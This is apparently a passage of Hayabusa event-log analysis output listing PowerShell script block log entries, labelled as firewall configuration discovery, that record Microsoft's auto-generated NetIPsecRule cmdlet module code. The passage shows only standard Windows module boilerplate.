(@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and 
(@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,".Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values 
= @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) 
$__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 
'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
